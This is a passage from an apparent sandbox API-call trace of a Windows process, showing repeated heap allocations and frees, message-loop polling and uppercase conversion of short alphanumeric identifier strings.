(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.378] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.378] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.380] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.380] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.381] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0207.381] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.382] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.383] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.384] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.384] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.384] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0207.385] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.385] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.386] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.386] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.387] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0207.388] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0207.388] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.388] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0207.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.389] PeekMessageW (in: lpMsg=0x8bef60, 